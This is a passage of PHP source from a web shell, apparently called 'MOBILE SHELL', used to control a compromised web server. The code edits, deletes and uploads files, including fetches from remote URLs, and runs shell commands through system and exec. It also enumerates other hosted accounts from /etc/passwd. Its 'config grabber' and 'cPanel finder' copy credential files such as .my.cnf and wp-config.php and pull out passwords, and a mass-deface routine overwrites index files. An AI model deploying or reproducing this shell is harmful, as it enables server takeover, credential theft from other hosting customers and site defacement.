  385.     </form></div>";
  386. }
  387.  
  388. // --- edit file --- //
  389. elseif($_COEG['command'] == 'edit') {
  390.     if($_COEG['save']) {
  391.         $save = file_put_contents($_COEG['file'], $_COEG['src']);
  392.     if($save) {
  393.     $q1 = 'Source Saved !!';
  394.     success1($q1);
  395.         } else {
  396.     $q1 = 'Permission Denied !!';
  397.     failed1($q1);
  398.     }
  399. }
  400. echo '<div class="coL-panel"><table>
  401. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">EDIT FILE</td></table></div>';
  402. echo '<div class="coL-option">
  403. <table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="#FF000">[</font> '.basename($_COEG['file']).' <font color="#FF000">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
  404. <hr><table>';
  405. echo "<th><a href='?command=view&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
  406. <th><button class='coL-btn-option-active'><i class='fa fa-pencil'></i></button></th>
  407. <th><a href='?command=rename&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
  408. <th><a href='?command=chmod&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
  409. <th><a href='?command=delete&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
  410. $source = htmlspecialchars(@file_get_contents($_COEG['file']));
  411. if(empty($source)) {
  412.     echo "<form method='post' action='?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."'  style='margin:0px'>
  413.     <textarea name='src' placeholder='# Put your code here...' class='top'></textarea><br>
  414. <input type='submit' class='btn-exe' value='Save' name='save' style='margin-top:3px;width: 100%'></form>";
  415. } else { echo "<form method='post' action='?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px'>
  416.     <textarea name='src' class='top'>".$source."</textarea>
  417. <input type='submit' value='Save' name='save' class='btn-exe' style='margin-top:3px;width: 100%'></form>";
  418.   }
  419. }
  420.  
  421. // --- view file --- //
  422. elseif($_COEG['command'] == 'view') {
  423. echo '<div class="coL-panel"><table>
  424. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">SOURCE VIEWER</td></table></div>';
  425. echo '<div class="coL-option">';
  426. echo '<table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="#FF000">[</font> '.basename($_COEG['file']).' <font color="#FF000">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
  427. <hr>';
  428. echo "<table><th><button class='coL-btn-option-active'><i class='fa fa-eye'></i></button></th>
  429. <th><a href='?command=edit&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
  430. <th><a href='?command=rename&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
  431. <th><a href='?command=chmod&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
  432. <th><a href='?command=delete&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
  433. $source = htmlspecialchars(@file_get_contents($_COEG['file']));
  434. if(empty($source)) {
  435.     $q1 = 'Source Not Found !!';
  436.     failed1($q1);
  437.     echo x9;
  438. } else {
  439.     echo "<pre class='top'><code class='php'>".$source."</code></pre>";
  440.     }
  441. }
  442.  
  443. // --- rename file --- //
  444. elseif($_COEG['command'] == 'rename') {
  445.         if($_COEG['rename']) {
  446.         $rename = rename($_COEG['file'], "$dir/".htmlspecialchars($_COEG['rename'])."");
  447.         if($rename) {
  448. $q1 = "File Renamed !!";
  449. $t1 = "?".x5.$dir;
  450. fauto2($q1, $t1);
  451.    } else {
  452. $q1 = "Permission Denied !!";
  453. $t1 = "?".x5.$dir;
  454. fauto1($q1, $t1);
  455.         }
  456. }
  457. echo '<div class="coL-panel"><table>
  458. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">RENAME FILE</td></table></div>';
  459. echo '<div class="coL-option"><table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="#FF000">[</font> '.basename($_COEG['file']).' <font color="#FF000">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
  460. <hr><table>';
  461. echo "<th><a href='?command=view&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
  462. <th><a href='?command=edit&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
  463. <th><button class='coL-btn-option-active'><i class='fa fa-edit'></i></button></th>
  464. <th><a href='?command=chmod&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
  465. <th><a href='?command=delete&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
  466. echo "<div class='coL-option top'>
  467. <br><br><br>
  468.     <center>
  469.         <i class='fa fa-file-o fa-3x'></i></center><br><br>";
  470. echo "<form action='?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px' method='post'>
  471. <table cellspacing='0'>
  472.     <td align='center' style='width:10%'><i class='fa fa-file-o'></i> </td><td style='width:70%'><input type='text' value='".basename($_COEG['file'])."' name='rename'></td><td style='width:20%'>
  473.     <button type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
  474.     </form></div>";
  475. }
  476.  
  477. // --- delete file --- //
  478. elseif($_COEG['command'] == 'delete') {
  479. $delete = unlink($_COEG['file']);
  480. if($delete) {
  481.         $q1 = '[ '.basename($_COEG['file']).' ] Deleted !!';
  482.         $t1 = '?'.x5.$dir;
  483.         fauto2($q1, $t1);
  484.         echo x10;
  485.     } else {
  486.         $q1 = 'Permission Denied !!';
  487.         $t1 = '?'.x5.$dir;
  488.         fauto1($q1, $t1);
  489.         echo x8;
  490.     }
  491. }
  492.  
  493. // --- rename directory --- //
  494. elseif($_COEG['command'] == 'renadir') {
  495.    $c = $_COEG['e'];
  496.     if($_COEG['e']) {
  497.         $e = rename($dir, "".dirname($dir)."/".htmlspecialchars($_COEG['e'])."");
  498.         if($e) {
  499. $q1 = 'Directory Renamed !!';
  500. $t1 = '?'.x5.dirname($dir);
  501. fauto2($q1, $t1);
  502.     } else {
  503. $q = 'Permission Denied !!';
  504. failed1($alert);
  505.     }
  506. }
  507. echo('<div class="coL-panel"><table>
  508. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">RENAME DIRECTORY</td></table></div>');
  509. echo("<div class='coL-option top'>
  510. <br><br><br>
  511.     <center>
  512.         <i class='fa fa-folder-o fa-3x'></i></center><br><br>");
  513. echo("<form action='?".x7."renadir&".x5.$dir."' style='margin:0px' method='post'>
  514. <table cellspacing='0'>
  515.     <td align='center' style='width:10%'><i class='fa fa-folder-o'></i> </td><td style='width:70%'><input type='text' value='".basename($dir)."' name='e'></td><td style='width:20%'>
  516.     <button type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
  517.     </form></div>");
  518. }
  519.  
  520. // --- delete directory --- //
  521. elseif($_COEG['command'] == 'deledir') {
  522. $x0z1 = deledir($dir);
  523.  if($x0z1) {
  524.         echo "<script>window.location = '?".x5.dirname($dir)."';</script>";
  525.         $q1 = 'Success !!';
  526.     success1($q1);
  527.     } else {
  528.         echo "<script>window.location = '?".x5.dirname($dir)."';</script>";
  529.         $q1 = 'Permission Denied !!';
  530.     failed1($q1);
  531.     }
  532. }
  533.  
  534. // --- multiple upload --- //
  535. elseif($_COEG['command'] == 'upload') {
  536. echo '<div class="coL-panel"><table>
  537. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">MULTIPLE UPLOAD</td></table></div>';
  538. if(isset($_REQUEST['ufile'])) {
  539. $ufile = $_COEG['ufile'] ;
  540. }
  541. if(isset($_REQUEST['upload'])) {
  542. if($_COEG['upload']){
  543. if(empty($ufile)) {
  544.     $cx = $_FILES['file']['name'];
  545. } else {
  546.     $cx = $ufile;
  547. }
  548. if(@copy($_FILES['file']['tmp_name'],$dir.'/'.$cx)) {
  549. $q1 ="File Uploaded !!";
  550. success1($q1); } else {
  551. $q1 ="Upload Failed !!";
  552. failed1($q1);
  553.           } } }
  554. echo '<div class="coL-option"><span class="label-default">+</span> Upload From Device :<hr>';
  555. echo '<form enctype="multipart/form-data" action="?'.x7.'upload&'.x5.$dir.'"   method="POST" style="margin:0px">
  556. <table style="width:100%">
  557. <td style="width:20%">File :</td>
  558. <td style="width:80%">
  559. <input type="file" name="file"></td>
  560. <tr>
  561. <td style="width:20%">Name :</td>
  562. <td style="width:80%"><input name="ufile" type="text" placeholder="" value="" /></td>
  563. <tr>
  564. <td style="width:20%"></td>
  565. <td style="width:80%"><input type="submit" name="upload" style="width:100px" value="Upload" class="btn-exe" />
  566. </td></table></form></div>';
  567.  
  568. if($_COEG["submit"]){
  569. $uname = $_COEG["uname"];
  570. $url = trim($_COEG["url"]);
  571. if($url){
  572. $file = fopen($url,"rb");
  573. if($file) {
  574. $valid_exts = array("css","php","html","htm","txt","zip","rar","png","jpg","jpeg","gif","mp3","mp4","3gp");
  575. $ext = end(explode(".",strtolower(basename($url))));
  576. if(in_array($ext,$valid_exts)){
  577. if(empty($uname)) {
  578.      $filename = basename($url);
  579.  } else {
  580.     $filename = $uname;
  581. }
  582. $newfile = fopen($dir.'/'.$filename, "wb");
  583. if($newfile){
  584. while(!feof($file)) {
  585. fwrite($newfile,fread($file,MS7Z), MS7Z);  } $q1 ="File Upoaded !!";
  586. success1($q1); } else {
  587. $q1 ="Upload Failed !!";
  588. failed1($q1); } } else { $q1 ="Extension Not Supported !!";
  589. failed1($q1); } } else { $q1 ="Link Invalid !!";
  590. failed1($q1); } } else { $q1 ="Link Empty !!";
  591. failed1($q1); } }
  592. echo '<div class="coL-option top"><span class="label-default">+</span> Upload From Internet :<hr>';
  593. echo '<form action="?'.x7.'upload&'.x5.$dir.'"  method="POST">';
  594. echo '<table style="width:100%">
  595. <td style="width:20%">Link :</td>
  596. <td style="width:80%"><input type="text" name="url" placeholder="" style="width:100%"></td>
  597. <tr>
  598. <td style="width:20%">Name :</td>
  599. <td style="width:80%"><input type="text" name="uname" style="width:100%"></td>
  600. <tr>
  601. <td style="width:20%"></td><td style="width:80%"><input type="submit" name="submit" style="width:100px" value="Upload" class="btn-exe"></td></table></form>
  602. </div>';
  603. }
  604.  
  605. // --- system information --- //
  606. elseif ($_COEG['command'] == 'system') {
  607. function exe($ms_x) {  
  608. if(function_exists('system')) {        
  609.         @ob_start();       
  610.         @system($ms_x);        
  611.         $ms_z = @ob_get_contents();        
  612.         @ob_end_clean();       
  613.         return $ms_z;  
  614.     } elseif(function_exists('exec')) {        
  615.         @exec($ms_x,$values);      
  616.         $ms_z = "";        
  617.         foreach($values as $value) {           
  618.             $ms_z .= $result;      
  619.         } return $ms_z;    
  620.     } elseif(function_exists('passthru')) {        
  621.         @ob_start();       
  622.         @passthru($ms_x);      
  623.         $ms_z = @ob_get_contents();        
  624.         @ob_end_clean();       
  625.         return $ms_z;  
  626.     } elseif(function_exists('shell_exec')) {      
  627.         $ms_z = @shell_exec($ms_x);        
  628.         return $ms_z;  
  629.     }
  630. }
  631. function disk($dz) {
  632. if($dz >= 1073741824)
  633. return sprintf('%1.2f',$dz / 1073741824 ).' GB';
  634. elseif($dz >= 1048576)
  635. return sprintf('%1.2f',$dz / 1048576 ) .' MB';
  636. elseif($dz >= 1024)
  637. return sprintf('%1.2f',$dz / 1024 ) .' KB';
  638. else
  639. return $dz .' B';
  640. }
  641. function fuck($b_ms, $c_ms, $d_ms){
  642.     if(strpos($b_ms, $c_ms) === FALSE) return FALSE;
  643.     if(strpos($b_ms, $d_ms) === FALSE) return FALSE;
  644.     $a_ms = strpos($b_ms, $c_ms) + strlen($c_ms);
  645.     $e_ms = strpos($b_ms, $d_ms, $a_ms);
  646.     $f_ms = substr($b_ms, $a_ms, $e_ms - $a_ms);
  647.     return $f_ms; }
  648. if(get_magic_quotes_gpc()) {
  649. function m_ms($n_ms) {
  650. return is_array($n_ms) ? array_map('m_ms', $n_ms) : stripslashes($n_ms); }
  651. $_COEG = m_ms($_COEG); }
  652.  
  653. $safemode = (@ini_get(strtolower("safe_mode")) == 'on') ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
  654.  
  655. $disablefunc = @ini_get("disable_functions");
  656. $mysql = (function_exists('mysql_connect')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
  657.  
  658. $curl = (function_exists('curl_version')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</font>";
  659.  
  660. $wget = (exe('wget --help')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
  661.  
  662. $perl = (exe('perl --help')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</font>";
  663.  
  664. $python = (exe('python --help')) ? "
  665. <span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
  666.  
  667. $ds_men = (!empty($disablefunc)) ? "<span class='label-danger'>".$disablefunc."</span>" : "<span class='label-success'>NONE</span>";
  668. if(!function_exists('posix_getegid')) {
  669.     $c_us = @get_current_user();
  670.     $c_id = @getmyuid();
  671.     $g_c = @getmygid();
  672.     $gr_p = "?";
  673. } else {
  674.     $c_id = @posix_getpwuid(posix_geteuid());
  675.     $g_c = @posix_getgrgid(posix_getegid());
  676.     $c_us = $c_id['name'];
  677.     $c_id = $c_id['uid'];
  678.     $gr_p = $g_c['name'];
  679.     $g_c = $g_c['gid'];
  680. }
  681. echo '<div class="coL-panel"><table>
  682. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">SYSTEM INFORMATION</td></table></div>';
  683. echo "<table width=100% class='table-info' cellspacing=0>
  684. <th class=th-info style=width:120px><center>Component</center></th>
  685. <th class=th-info><center>Arrow</center></th>
  686. <th class=th-info break><center>Result</center></th></tr>";
  687. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Server </td><td class='td-info' align='center'>&raquo;</td>
  688. <td class='td-info'> ".$_SERVER['SERVER_SOFTWARE']."</td></tr>";
  689. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
  690. Username</td><td class='td-info' align='center'>&raquo;</td>
  691. <td class='td-info'> ".$c_us." [".$c_id."]</td></tr>";
  692. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
  693. Group</td><td class='td-info' align='center'>&raquo;</td>
  694. <td class='td-info'>".$gr_p." [".$g_c."]</td></tr>";
  695. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
  696. Server IP </td><td class='td-info' align='center'>&raquo;</td>
  697. <td class='td-info'>".gethostbyname($_SERVER['HTTP_HOST'])."</td></tr>";
  698. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
  699. Your IP </td><td class='td-info' align='center'>&raquo;</td>
  700. <td class='td-info'> ".$_SERVER['REMOTE_ADDR']."</td></tr>";
  701. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
  702. PHP Version</td><td class='td-info' align='center'>&raquo;</td>
  703. <td class='td-info'> ".@phpversion()."</td></tr>";
  704. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Disk Space</td> <td class='td-info' align='center'>&raquo;</td>
  705. <td class='td-info'>[".disk(disk_free_space("/"))."] / [".disk(disk_total_space("/"))."]</td></tr>";
  706. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Safe Mode</td><td class='td-info' align='center'>&raquo;</td>
  707. <td class='td-info'> $safemode</td></tr>";
  708. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> MySQL</td><td class='td-info' align='center'>&raquo;</td><td class='td-info'>$mysql</td></tr>";
  709. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
  710. Perl</td><td class='td-info' align='center'>&raquo;</td>
  711. <td class='td-info'> $perl </td></tr>";
  712. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Python</td><td class='td-info' align='center'>&raquo;</td>
  713. <td class='td-info'>$python</td></tr>";
  714. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> WGET</td><td class='td-info' align='center'>&raquo;</td>
  715. <td class='td-info'>$wget</td></tr>";
  716. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> CURL</td><td class='td-info' align='center'>&raquo;</td><td class='td-info'>$curl</td></tr>";
  717.  if(get_magic_quotes_gpc() == "1" or get_magic_quotes_gpc() == "on") {
  718.   echo "<tr class='ex-hov'><td align='left' class='td-info'><span class='label label-default'>+</span> Magic Quotes  </td><td class='td-info' align='center'>&raquo;</td>
  719. <td><span class='label label-success'>ON</span></tr>"; } else { echo "<tr class='ex-hov'><td align='left' class='td-info'><span class='label label-default'>+</span> Magic Quotes  </td><td class='td-info' align='center'>&raquo;</td><td class='td-info'><span class='label label-danger'>OFF</span></td></tr>"; }
  720. echo "</table>";  
  721. echo '<div class="coL-panel top"><table>
  722. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">KERNEL</td></table></div>';
  723. echo "<div class ='coL-option' style='margin-bottom:3px;padding:7px'>".php_uname()."</div>";
  724. echo '<div class="coL-panel top"><table>
  725. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">DISABLE FUNCTION</td></table></div>';
  726. echo "<div class='coL-option' style='padding:7px'>".$ds_men."</div>";
  727. }
  728.  
  729. // --- jumping server --- //
  730. elseif($_COEG['command'] == 'jumping') {
  731. echo '<div class="coL-panel"><table>
  732. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">JUMPING SERVER</td></table></div>';
  733. $i = 0;
  734. $s_a = fopen("/etc/passwd", "r");
  735. while($s_b = fgets($s_a)) {
  736.     if($s_b == '' || !$s_a) {
  737.          $q1 = "Can't Read [ /etc/passwd ]";
  738.                  $t1 = "?".x5.$dir;
  739.                  fauto1($q1, $t1);
  740.                  echo x9;
  741.     } else {
  742.         preg_match_all('/(.*?):x:/', $s_b, $s_c);
  743.         foreach($s_c[1] as $s_d) {
  744.             $s_e = "/home/$s_d/public_html";
  745.             if(is_readable($s_e)) {
  746.                 $i++;
  747.                 $s_o = "<table style='width:100%' class='table-info' cellspacing='0'><td style='width:120px' class='td-file'><img src='data:image/png;base64, R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA'> <a href='?dir=$s_e'>[ $s_d ]</a></td>";
  748.                 if(is_writable($s_e)) {
  749.                     $s_o = "<table style='width:100%' class='table-info' cellspacing='0'><td style='width:120px' class='td-info'><img src='data:image/png;base64, R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA'>
  750.                      <a href='?dir=$s_e'><font color='red'>[ $s_d ]</font></a></td>";
  751.                 }
  752.                 echo $s_o;
  753.                 $s_k = file_get_contents("/etc/named.conf");   
  754.                 if($s_k == '') {
  755.                      $q1 = "Server Not Found !!";
  756.                      $t1 = "?".x5.$dir;
  757.                      fauto1($q1, $t1);
  758.                       echo x9;
  759.                 } else {
  760.                     preg_match_all("#/var/named/(.*?).db#", $s_k, $s_v);
  761.                     foreach($s_v[1] as $s_x) {
  762.                         $s_g = posix_getpwuid(@fileowner("/etc/valiases/$s_x"));
  763.                         $s_g = $s_g['name'];
  764.                         if($s_g == $s_d) {
  765.                             echo "<td class='td-info'><a href='http://$s_x'>http://$s_x</a> </td></table>"; break;}}}}}}}
  766. if($i == 0) {
  767.          $q1 = "Server Not Found !!";
  768.          $t1 = "?".x5.$dir;
  769.          fauto1($q1, $t1);
  770.          echo x9;
  771. } else {
  772.     echo "<div class='coL-option top'>Total : <span class='label label-default'> ".$i." <span></div>";
  773.     }
  774. }
  775.  
  776. // --- config grabber --- //
  777. elseif($_COEG['command'] == 'config') {
  778.     $s_t = fopen("/etc/passwd", "r");
  779.     $s_z = mkdir("underxploit-config", 0777);
  780.     $s_s = "Options all\
  781. Require None\
  782. Satisfy Any";
  783.     $s_d = fopen("underxploit-config/.htaccess","w");
  784.     fwrite($s_d, $s_s);
  785.     while($s_q = fgets($s_t)) {
  786.         if($s_q == "" || !$s_t) {
  787.             $q1 = 'Can\'t Read etc/passwd !!';
  788.             failed1($q1);
  789.         } else {
  790.             preg_match_all('/(.*?):x:/', $s_q, $s_y);
  791.             foreach($s_y[1] as $s_p) {
  792.                 $s_k = "/home/$s_p/public_html/";
  793.                 if(is_readable($s_k)) {
  794.                     $s_g = array(
  795.                         "/home/$s_p/.my.cnf" => "cpanel",
  796.                         "/home/$s_p/.accesshash" => "WHM-accesshash",
  797.                         "/home/$s_p/public_html/bw-configs/config.ini" => "BosWeb",
  798.                         "/home/$s_p/public_html/config/koneksi.php" => "Lokomedia",
  799.                         "/home/$s_p/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  800.                         "/home/$s_p/public_html/clientarea/configuration.php" => "WHMCS",
  801.                         "/home/$s_p/public_html/whm/configuration.php" => "WHMCS",
  802.                         "/home/$s_p/public_html/whmcs/configuration.php" => "WHMCS",
  803.                         "/home/$s_p/public_html/forum/config.php" => "phpBB",
  804.                         "/home/$s_p/public_html/sites/default/settings.php" => "Drupal",
  805.                         "/home/$s_p/public_html/config/settings.inc.php" => "PrestaShop",
  806.                         "/home/$s_p/public_html/app/etc/local.xml" => "Magento",
  807.                         "/home/$s_p/public_html/joomla/configuration.php" => "Joomla",
  808.                         "/home/$s_p/public_html/configuration.php" => "Joomla",
  809.                         "/home/$s_p/public_html/wp/wp-config.php" => "WordPress",
  810.                         "/home/$s_p/public_html/wordpress/wp-config.php" => "WordPress",
  811.                         "/home/$s_p/public_html/wp-config.php" => "WordPress",
  812.                         "/home/$s_p/public_html/admin/config.php" => "OpenCart",
  813.                         "/home/$s_p/public_html/slconfig.php" => "Sitelok",
  814.                         "/home/$s_p/public_html/application/config/database.php" => "Ellislab");
  815.                     foreach($s_g as $s_h => $s_l) {
  816.                         $s_r = file_get_contents($s_h);
  817.                         if($s_r == '') {
  818.                         } else {
  819.                             $fcS = fopen("underxploit-config/$s_p-$s_l.txt","w");
  820.                             fputs($fcS,$s_r);
  821.                         }}}}}}
  822. $q1 = "OK !!";
  823. $t1 = "?".x5.$dir."/underxploit-config";
  824. fauto2($q1, $t1);    
  825. echo x10;  
  826. }
  827.  
  828. // --- file grabber --- //
  829. elseif($_COEG['command'] == 'filegrab') {
  830. echo '<div class="coL-panel"><table>
  831. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">FILE GRABBER</td></table></div>';
  832. if($_COEG['grab']) {
  833. $name = $_COEG['name'];
  834. $rz = $_COEG['link'];
  835. $x = file_get_contents($rz);
  836. if(empty($x)) {
  837. $q1 = 'Can\'t Grab File !!';
  838. failed1($q1);
  839. } else { $q1 = 'Done !!';
  840. success1($q1);
  841. $fp = fopen($dir."/".$name, "w");
  842. fwrite($fp, $x);
  843. fclose($fp);
  844. echo '<meta http-equiv="Refresh" content="0; URL=?dir='.$dir.'">'; } }
  845. echo "<div class='coL-option top'>
  846. File Grabber :<hr>
  847. <form action='?".x7."filegrab&".x5.$dir."' method='post'>
  848. <table cellspacing='0'>
  849.     <td style='width:20%'>Link :</td><td style='width:80%'>
  850.     <input type='text' value='' name='link' style='width:100%'></td><tr>
  851.     <td style='width:20%'>Name :</td><td style='width:80%'>
  852.     <input type='text' value='' id='name' name='name' style='width:100%'></td><tr>
  853.     <td style='width:20%'></td><td style='width:80%'>
  854.     <input type='submit' onclick='saveForm();return false;' class='btn-exe' value='Grab It !' name='grab' style='width:100px'></td></table></form></div>";
  855. echo '<script>function saveForm(){
  856. if(document.getElementById("name").value == ""){
  857.      $.alert ({
  858.         icon: "fa fa-code",
  859.         title: "MOBILE SHELL",
  860.         content: "Can\'t Be Empty !!",
  861.         theme: "Dark",
  862.         type: "red",
  863.         });
  864.      return false;
  865.    }
  866.    document.getElementById("sks").submit();
  867.  }
  868. </script>';
  869. }
  870.  
  871. // --- cpanel finder  --- //
  872. elseif($_COEG['command'] == 'cpanel') {
  873. echo '<div class="coL-panel"><table>
  874. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">CPANEL FINDER</td></table></div>';
  875. @ini_set('display_errors',0);
  876. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  877.     $ar0=explode($marqueurDebutLien, $text);
  878.     $ar1=explode($marqueurFinLien, $ar0[$i]);
  879.     return trim($ar1[0]);
  880. }
  881. $d0mains = @file('/etc/named.conf');
  882. $domains = scandir("/var/named");
  883. if ($domains or $d0mains) {
  884.     $domains = scandir("/var/named");
  885.     if($domains) {
  886. echo "<table class='table-info' style='width:100%'><th class='th-info'> <center>Domain</center> </th><th class='th-info'> <center>Result</center></th></tr>";
  887. $count=1;
  888. $dc = 0;
  889. $list = scandir("/var/named");
  890. foreach($list as $domain){
  891. if(strpos($domain,".db")){
  892. $domain = str_replace('.db','',$domain);
  893. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  894. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  895. $path = getcwd();
  896. if (is_readable($dirz)) {
  897. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  898. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  899. $password=entre2v2($p,'password="','"');
  900. echo "<tr>
  901. <td class='td-info' style='width:150px'><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td>
  902. <td class='td-info'><a class='a' href='".$owner['name'].".txt' target='_blank'>OPEN</a></td></tr>";
  903. $dc++; }}}
  904. echo '</table>';
  905. $total = $dc;
  906. echo '<div class="coL-option top" style="">Total Cpanel : <span class="label label-default">'.$total.'</span></div>';
  907. }else{
  908. $d0mains = @file('/etc/named.conf');
  909.     if($d0mains) {
  910. echo "<table class='table-info' style='width:100%'><tr><th class='th-info'> <center>Domain</center> </th><th class='th-info'> <center>Result</center> </th></tr>";
  911. $count=1;
  912. $dc = 0;
  913. $mck = array();
  914. foreach($d0mains as $d0main){
  915.     if(@eregi('zone',$d0main)){
  916.         preg_match_all('#zone "(.*)"#',$d0main,$domain);
  917.         flush();
  918.         if(strlen(trim($domain[1][0])) >2){
  919.             $mck[] = $domain[1][0];
  920.         } } }
  921. $mck = array_unique($mck);
  922. $usr = array();
  923. $dmn = array();
  924. foreach($mck as $o) {
  925.     $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  926.     $usr[] = $infos['name'];
  927.     $dmn[] = $o;
  928. }
  929. array_multisort($usr,$dmn);
  930. $dt = file('/etc/passwd');
  931. $passwd = array();
  932. foreach($dt as $d) {
  933.     $r = explode(':',$d);
  934.     if(strpos($r[5],'home')) {
  935.         $passwd[$r[0]] = $r[5];
  936.     }
  937. }
  938. $l=0;
  939. $j=1;
  940. foreach($usr as $r) {
  941. $dirz = '/home/'.$r.'/.my.cnf';
  942. $path = getcwd();
  943. if (is_readable($dirz)) {
  944. copy($dirz, $path.'/'.$r.'.txt');
  945. $p=file_get_contents($path.'/'.$r.'.txt');
  946. $password=entre2v2($p,'password="','"');
  947. echo "<tr>
  948. <td class='td-info'><a target='_blank' href=http://".$dmn[$j-1]."/>".$dmn[$j-1]." </a></td>
  949. <td class='td-info'><a href='".$r.".txt'>OPEN</a> </center></td></tr>";
  950. $dc++;
  951.                 flush();
  952.                 $l=$l?0:1;
  953.                 $j++;
  954.         }
  955.     }
  956. }
  957. echo '</table>';
  958. $total = $dc;
  959. echo '<div class="coL-option top" style="">Total Cpanel : <span class="label label-default">'.$total.'</span></div>';
  960.     }
  961. } else{
  962.     $q1 = 'Access Disabled !!';
  963.     $t1 = '?'.x5.$dir;
  964.     fauto1($q1, $t1);
  965.     echo x9;
  966.     }
  967. }
  968.  
  969. // --- mass deface --- //
  970. elseif ($_COEG['command'] == 'massdef') {
  971. echo '<div class="coL-panel"><table>
  972. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">MASS DEFACE</td></table></div>';
  973. echo '<div class="coL-option">';
  974. echo "<form action='?".x7."massdef&".x5.$dir."' method='post'>";
  975. echo "<table cellspacing='0'>
  976. <td align='left' style='padding:7px;width:60px'>
  977. Root :</td><td><input type='text' name='base_dir' style='width:100%' value='".getcwd()."'></td></tr>";
  978. echo "<tr><td align='left' style='padding:7px;width:60px'>File :</td><td> <input type='text' name='file_name' value='index.php' style='width:100%' placeholder=''></td></tr></table>";
  979. echo "<br>Source :<br><br>
  980. <textarea name='index'># Hacked By Wildan Izzudin !!</textarea>";
  981. echo "<input type='submit' value='CROT' class='btn-exe' style='width:100%;margin-top:3px'></form></center></div>";
  982. if (isset ($_COEG['base_dir']))
  983. {
  984.         if (!file_exists ($_COEG['base_dir'])) {
  985.  $alert = "Destination Not Found !";
  986.  failed1($alert); }
  987.         @chdir ($_COEG['base_dir']) or die ("<script>alert('Cannot Open Directory');</script>");
  988.  
  989.         $files = @scandir ($_COEG['base_dir']) or die ("Oh Shit !!<br>");
  990.         foreach ($files as $file):
